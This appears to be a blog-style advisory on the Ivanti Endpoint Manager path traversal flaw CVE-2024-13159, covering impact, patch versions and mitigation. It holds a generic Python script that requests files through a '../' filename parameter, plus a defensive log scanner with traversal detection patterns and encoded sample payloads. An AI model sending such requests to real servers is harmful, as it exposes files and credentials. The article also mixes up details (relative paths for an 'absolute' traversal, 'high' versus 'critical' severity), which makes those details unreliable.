A high-severity vulnerability, identified as CVE-2024-13159, has been discovered in Ivanti Endpoint Manager (EPM). This absolute path traversal vulnerability allows a remote unauthenticated attacker to leak sensitive information. The affected Ivanti EPM versions are those before the 2024 January-2025 Security Update and the 2022 SU6 January-2025 Security Update. In this article, we discuss the impact of this vulnerability, the exploit details, and how to mitigate the issue.

Exploit Details

CVE-2024-13159 is an absolute path traversal vulnerability within the file handling functions of Ivanti EPM. This vulnerability exists due to a lack of proper input validation and sanitization. Specifically, the affected functionality does not restrict an attacker from traversing the file system to access files outside the intended directory.

An unauthenticated attacker can exploit this vulnerability by sending a specially crafted web request to the Ivanti EPM server, which can lead to unauthorized disclosure of sensitive information. Such information may include system configuration details, server logs, user credentials, and other confidential data.

Code Snippet

To give an idea of the exploit, here's a simple Python script example that demonstrates how an attacker can exploit the vulnerability:

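import requests

# Placeholders: the target host, port and endpoint are not specified here.
target_url = "https://[target_ip]:[port]/path/to/vulnerable/endpoint"
# Placeholder path that points outside the intended directory.
traversal_path = "../../../../path/to/sensitive/file.txt"

# The path is passed to the server as a request parameter.
payload = {
    "filename": traversal_path
}

# verify=False disables TLS certificate validation for this request.
response = requests.get(target_url, params=payload, verify=False)

# A 200 response with file contents indicates the server returned the file.
if response.status_code == 200:
    print("Successfully leaked sensitive data:")
    print(response.text)
else:
    print("Failed to exploit vulnerability")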

Original References

[1] Ivanti EPM Security Advisory: https://[ivanti_security_advisory_link]
[2] CVE-2024-13159 Entry in NIST National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-13159

To mitigate the impact of CVE-2024-13159, follow these steps:

1. Update your Ivanti EPM software to the latest available version. Download the 2024 January-2025 Security Update or the 2022 SU6 January-2025 Security Update from Ivanti's website and install it on your Ivanti EPM server.

2. As a defensive measure, monitor your server logs for any unusual or suspicious activity, such as multiple failed login attempts or unauthorized remote connections.

3. Implement security best practices for your environment, including strong authentication mechanisms, least-privilege access policies, and regular security monitoring.
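
The log monitoring in step 2 can be made specific to this class of bug. The example below is added here (it is not from the original article or from Ivanti) and scans request URIs for query parameters whose decoded values contain traversal segments or absolute paths. The log layout, endpoint and parameter names are constructed for illustration, and the patterns are generic rather than Ivanti-specific.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Generic path-escape patterns (assumed for illustration, not Ivanti-specific).
SUSPICIOUS = [
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),    # ../ or ..\ segment
    ("drive_path", re.compile(r"^[A-Za-z]:[\\/]")),          # C:\...
    ("unc_path", re.compile(r"^(\\\\|//)[^\\/]+[\\/]")),     # \\host\share\...
    ("rooted_path", re.compile(r"^[\\/](?![\\/])")),         # /etc/... or \dir\...
]

# Constructed sample lines in a simplified "client method uri status" layout.
SAMPLE_LOG = """\
198.51.100.7 GET /app/report?id=42&name=summary.txt 200
198.51.100.9 GET /app/download?filename=..%2f..%2f..%2fsecret.txt 200
198.51.100.9 GET /app/download?filename=%252e%252e%255cconfig.xml 404
203.0.113.5 GET /app/download?filename=C%3A%5Cdata%5Cfile.txt 200
203.0.113.5 GET /app/download?filename=%5C%5Chost.example%5Cshare%5Cf.txt 200
"""

def fully_decode(value, max_rounds=3):
    # Decode repeatedly so double-encoded input (%252e%252e) is normalised too.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_value(value):
    value = fully_decode(value)
    return [name for name, rx in SUSPICIOUS if rx.search(value)]

def scan_request(uri):
    """Return [(param, labels)] for query parameters carrying path-like values."""
    pairs = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    return [(k, labels) for k, labels in ((k, classify_value(v)) for k, v in pairs) if labels]

def scan_log(text):
    findings = []
    for line in text.splitlines():
        client, method, uri, status = line.split()
        for param, labels in scan_request(uri):
            findings.append((client, param, labels, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry rooted paths, such as redirect targets, will match `rooted_path`, so restrict the scan to endpoints and parameters that are expected to carry file names. Hits that returned status 200 deserve the closest review.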

Conclusion

CVE-2024-13159 is a critical vulnerability that affects the security of Ivanti EPM systems. Organizations using vulnerable versions of the software should immediately apply the necessary security updates and follow best practices for securing their environment. By staying informed of emerging threats and regularly updating software, organizations can minimize the risk of security breaches and protect their valuable data.

Timeline

Published on: 01/14/2025 18:15:26 UTC
Last modified on: 03/13/2025 15:28:42 UTC